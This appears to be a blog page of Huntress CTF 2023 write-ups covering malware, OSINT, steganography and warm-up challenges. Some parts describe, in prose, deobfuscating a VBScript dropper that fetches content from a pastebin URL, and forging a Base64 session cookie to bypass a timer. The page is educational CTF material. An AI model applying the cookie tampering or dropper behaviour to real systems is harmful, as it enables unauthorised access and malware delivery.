Baker Street Forensics

Huntress CTF: Week 2 – Malware: VeeBeeEee, Snake Eater, Opendir

VeeBeeEee

First examine the file contents.

Ooof. That hurts the eyes. If we throw it into CyberChef, with the assistance of some magic (or detailed reading of the challenge), we see that it’s VB Script, which can be converted using the Microsoft Script Decoder recipe.

Copy the output to VS Code.

The syntax highlighting shows that all the ””””””””al37ysoeopm’al37ysoeopm entries are just comments, so let’s remove them.

There also seems to be an abundance of “&” obscuring the code. We’ll remove them too.

That’s a lot more readable. Looking at the code we see it’s going to use PowerShell to create a file C:\Users\Pubic\Documents\July.htm using as input the content from a pastebin URL.

Snake Eater

We’ll detonate snake_eater.exe in our lab environment.

I really enjoyed this challenge as I used my detonaRE PowerShell script to control the detonation and solve the challenge. Besides firing the malware itself, the script will initiate a pcap capture and monitor the malware process using Process Monitor. The script the converts the ProcMon output to csv for easy analysis.

Scrolling through the csv we find that the application was writing a file to:

~\AppData\Roaming\Mael Horns\flag{hashforflag}

Opendir

Let’s get Started

The link brings us to an Open Directory (duh) with lots of scripts and executables, not to mention a number of subdirectories.

The first thing to do is grab everything.

Site Sucker works well for this.

Once we’ve captured all the files and subdirectories locally we can search through them en masse. Once again in this CTF, the_silver_searcher (ag) comes into play.

Tucked away in /sir/64_bit_new/oui.txt is the flag.

Use the tag #HuntressCTF on BakerStreetForensics.com to see all related posts and solutions for the 2023 Huntress CTF.

Huntress CTF: Week 2 – OSINT: Where Am I?, Operation Not Found, Under the Bridge

CTF, DFIR, OSINT, PowerShell

Where Am I?

Opening the picture we see it’s a location.

I’ve frequently used exiftool to inspect the metadata of pictures, including GPS coordinates.

The file does contain GPS metadata but before we even get there, looks like something out of the ordinary for the Image Description…

Instead of the usual CyberChef, this time we’ll do the conversion using PowerShell.

The converted string is our flag.

Operation Not Found

First off, lets adjust the positioning of the image and see if we can get better view of our location.

That’s better.

Actually when I ran this challenge, I started on my mobile device.

I took a screenshot of the building and then used the Google Lens function to identify the building.

Georgia Tech Library. That’s consistent with the description in the challenge. I bring up the location in Google Maps.

Zooming and scrolling and zooming and scrolling to get the Google Maps location and the mini-map on the challenge to the same areas. The mini-map is a PAIN to navigate. Even knowing where I was going to it took me several minutes to manipulate my positioning on the map.

But once I’m finally there, I mark my location and submit for the flag and…

Under the Bridge

Pretty much the same methodology as above.

Pivot the screen for a clearer landmark.

Grab a screenshot and send it to Google Lens

Rickroll Tunnel. LOL.

Once again back and forth with Google Maps and the mini-map and getting familiar with all the London highways, and finally….

Use the tag #HuntressCTF on BakerStreetForensics.com to see all related posts and solutions for the 2023 Huntress CTF.

Huntress CTF: Week 2 – Steganography: Land Before Time

CTF, DFIR, Steganography

Land Before Time

Here’s what we see when we open the image.

Exiftool doesn’t have any interesting metadata.

Let’s toss it into a iSteg.

I think it found something. What about you?

Use the tag #HuntressCTF on BakerStreetForensics.com to see all related posts and solutions for the 2023 Huntress CTF.

Huntress CTF: Week 2 – WarmUps

CTF, DFIR

Chicken Wings

Opening the file with a text editor yields… (if you’re old like me you may recognize it)

Wingdings! Head over to dcode.fr and translate it.

F12

Hit the Start button and we’re provided with a URL and port.

Open the site in a browser and enable source debugging, usually “F12” as the challenge suggests.

If you click on the blue Capture The Flag button, you may observe a VERY quick pop-up.

If we scroll to the bottom of the source code, (in CTF’s and Malware I always tend to hunt bottom up first), we see that the pop-up being invoked is at ./capture_the_flag.htm/. If we append that to our current URL…

We get to our flag page. Here I right clicked on the “Your flag is:” to select View Page Source.

Magic Cookies

As with previous interactive challenges, we’ll start with the obvious “Start”

We have a URL and port. Let’s open this in Chrome.

Pressing cook next to one of the recipes starts a countdown timer.

F12 in Chrome will toggle the Developer options.

Navigating to Application > Storage reveals the cookies. We have a cookie for in_oven with a Base64 value.

This gets decoded as {“recipe”: “Magic Cookies”, “time”: “10/11/2023, 15:50:04”}

Having also reviewed the source code it looks like this value that’s representing the start of the ‘baking.’ Either we can wait around for 120 hours to see what happens next, or we can travel through time. Sort of.

So we know the formula for the cookie values. We can use that to generate our own cookie. Using the same text, only changing the date to 10/06/2023, we’ll encode that string in Base64.

There’s a plugin for Chrome called “🍪 EditThisCookie “.

Substitute the Base64 we generated and apply the cookie.

Refresh the window and the flag should appear.

Use the tag #HuntressCTF on BakerStreetForensics.com to see all related posts and solutions for the 2023 Huntress CTF.